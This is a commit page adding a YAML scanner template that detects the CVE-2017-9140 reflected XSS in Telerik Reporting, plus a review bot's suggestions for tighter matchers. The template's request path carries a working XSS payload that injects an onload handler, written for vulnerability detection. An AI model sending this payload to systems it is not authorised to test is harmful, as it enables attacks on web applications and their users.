Create CVE-2017-9140.yaml

patch-1
Dhiyaneshwaran 2021-06-09 18:40:47 +05:30 committed by GitHub
parent 1f36178d37
commit 6c79bfa14d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 18 additions and 0 deletions


@ -0,0 +1,18 @@
id: CVE-2017-9140
info:
name: CVE-2017-9140
author: dhiyaneshDk
severity: medium
tags: cve2017,xss,telerik
reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
requests:
- method: GET
path:
- '{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)'
matchers:
- type: word
words:
- '<body style="background-color: #000000;" onload="prompt(1);">'
condition: and
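Review bot: The only matcher is a single body word, so any response that echoes that `<body …>` string is reported as vulnerable, even if it is served as `text/plain`, JSON, or an error page where the markup would not render. I would require an HTML content type and a 200 status alongside the body match via `matchers-condition: and`. The existing `condition: and` is a no-op on a one-item `words` list and can be dropped. The `info` block would also be easier to triage with a descriptive `name` (currently just the CVE id) and a short `description` of the affected Telerik Reporting component. Indentation is lost in this rendering, so the nesting of `matchers` under the request could not be checked here.

```yaml
    # … unchanged: method and path …
    matchers-condition: and
    matchers:
      - type: word
        part: body
        # … unchanged: words list with the reflected <body> tag …
      - type: word
        part: header
        words:
          - 'text/html'
      - type: status
        status:
          - 200
```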